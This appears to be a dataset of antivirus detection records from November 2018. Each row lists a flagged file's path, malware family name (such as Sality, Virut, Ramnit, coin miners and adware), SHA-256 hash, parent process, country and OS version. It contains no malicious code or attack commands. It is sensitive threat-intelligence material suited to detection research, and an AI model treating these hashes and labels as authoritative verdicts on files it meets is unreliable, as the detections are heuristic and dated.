  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-18-19-26.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T00:39:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173053-eed7178c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-173029-EAB60B02\\AVSCAN-20181104-173053-EED7178C', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:32:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T23:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atu.exe', filepath='\\\\?\\E:\\ATU.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:30:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160457-d5cb8292', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-155558-81439129\\AVSCAN-20181104-160457-D5CB8292', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:05:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='8000ff150f4bb7025786af01066c09c638c40cc8edd1f227a6b7ffb6b345f93a', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T06:50:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\SOFTWARE\\Windows 10 Manager v2.3.4\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:fTidhvaWsk6bswq\\\\\\/.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T13:53:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131426-25ad07dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131426-25AD07DD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:14:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/s \\\\\\"NIS\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Norton Internet Security\\\\\\\\Engine\\\\\\\\18.7.0.13\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Norton Internet Security\\Engine\\18.7.0.13\\ccsvchst.exe', parentsize=130008, timestamp='2018-11-04T09:14:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154041-f17670b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77a591b5\\AVSCAN-20181104-154024-EED9F8A3\\AVSCAN-20181104-154041-F17670B2', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:40:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130608-000c910d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130608-000C910D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='doc forever.exe', filepath='G:\\doc forever.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.178\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=13797712, timestamp='2018-11-04T08:57:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T15:56:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='system volume information.exe', filepath='F:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='NE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-04T17:20:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134441-4e8363df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9c4301d\\AVSCAN-20181104-133822-1E046ACA\\AVSCAN-20181104-134441-4E8363DF', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-213602-afc72178', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b208b16\\AVSCAN-20181104-213540-AB42781C\\AVSCAN-20181104-213602-AFC72178', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182697.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp105\\A0182697.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:18:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T17:42:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sures.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\L210_WW_WIN_3793_42\\LIB\\0415\\sures.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='684363cde47c2aae3559e899f0184f3b6bbe1fca44a16dbb5e96decd0226a614', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T01:07:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T02:03:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='recycler.exe', filepath='E:\\RECYCLER_DETEC\\RECYCLER.exe', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:36:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T07:05:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='brh.dll', filepath='C:\\Windows\\Temp\\nsm818.tmp\\brh.dll', filesize=960000, name='HEUR/AGEN.1034999.#M1.#R1'), hash='7643b17b3d571bd272f3284bf57eec71dac66c207f7602b0f063aec1c38aea92', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=9773272, timestamp='2018-11-04T18:54:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211919-a7f270d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8042744\\AVSCAN-20181104-204911-B6642F9B\\AVSCAN-20181104-211919-A7F270D6', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140245-f1ad7d6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140245-F1AD7D6D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T14:39:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\ABA77A91F42D6333B4F699C3952DFD435B134CD8DFA9EB004380C6F3247C47BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:20:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='8cbaaeb386ffec023c4d585d416ff4a7503cb809f153a7f78b522badd4d9e539', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T11:41:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205222-0497a8e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-205222-0497A8E8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='taskbar eliminator.exe', filepath='\\?\\S:\\átnézni\\script\\Taskbar Eliminator\\Taskbar Eliminator.exe', filesize=1856000, name='W32/Stanit.#M1.#R1'), hash='7c9a5aa1e28544bce312a86a4fa27c77e47becdec81176528358c6b4235a3c15', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:15:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163854-aabb65a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163854-AABB65A7', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nladminpro.exe', filepath='E:\\Programas1\\Network.LookOut.Administrator.Professional.v2.6.7\\Crack\\NLAdminPro.exe', filesize=640000, name='W32/Neshta.A.#M1.#R1'), hash='d10c6f13c24d5a4fb4b478bda9f08b4387ad4e770b72db3cb2b1c007d90108a5', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\MWL361-MW\\mb-clean-3.1.0.1035.exe', parentsize=900384, timestamp='2018-11-02T04:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tlntsvr.exe', filepath='d:\\windows\\winsxs\\x86_microsoft-windows-telnet-server-tlntsvr_31bf3856ad364e35_6.1.7600.16385_none_be9afc7752263ea7\\tlntsvr.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='7661fdb33971bc69ef7679b353a481f6960feea22895f5cfe194e80c31483e63', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='c4b2b76df85370d61d32afc6e7ff4870d95f0d617b8479e554e798406aa830be', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T11:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bi.exe', filepath='c:\\users\\X\\appdata\\roaming\\bi.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=460288, timestamp='2018-11-02T19:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-192118-b49a84b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd033764\\AVSCAN-20181102-191717-9F936E18\\AVSCAN-20181102-192118-B49A84B1', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:21:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T03:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\_cdres\\_exe\\Install Navigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='fe57d2435a26d4a86188dc8b7caf402d0cbbdc584abfc6bfea36e7de89e4c172', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashtoollib.v1.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\OPPO_CUSTOM_MDT_V2\\FlashToolLib.v1.dll', filesize=2752000, name='W32/Ramnit.CD.#M1.#R1'), hash='9e0befaf3971ab2474bdc12cc6da45ecb9f6350ad0cf8bf52ab649b77a943c73', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:28:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-232358-c801b4de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_baed4682\\AVSCAN-20181101-231055-4CFA8B92\\AVSCAN-20181101-232358-C801B4DE', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:23:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081437-363795fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081437-363795FB', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cdbxp_setup_4.5.4.5000.exe', filepath='c:\\users\\X\\downloads\\cdbxp_setup_4.5.4.5000.exe', filesize=5644000, name='PUA/OpenCandy.#M1.#R1'), hash='e7c7de9c5a78e67740cc849fcd9d2cc760be1688ffb045d6dd38a0eb286defae', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T07:52:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060520-494bce2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bae14625\\AVSCAN-20181102-055814-1CD18979\\AVSCAN-20181102-060520-494BCE2F', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:05:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='berkelium.exe', filepath='\\\\?\\E:\\ShowDawZ\\berkelium.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='a681d3e41eded7b5c9bdce7ad04b17bb65a135cf9b7e9857e3c770410c74407d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093614-d2f90ad7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070e7913\\AVSCAN-20181102-093303-BA858695\\AVSCAN-20181102-093614-D2F90AD7', filesize=776000, name='PUA/SearchProtect.#M1.#R1'), hash='df6f18bce3dc95ea14da9545229330467cb5459ab63b05c1d994a48297905b4f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:36:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-020554-df49fa13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-020554-DF49FA13', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b33bb3ac041c00d733a4b3cfe4358961e05a0060de27643c4c016f7d473d0541', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:53Z'), dt=datetime.date(2018, 11, 2)),
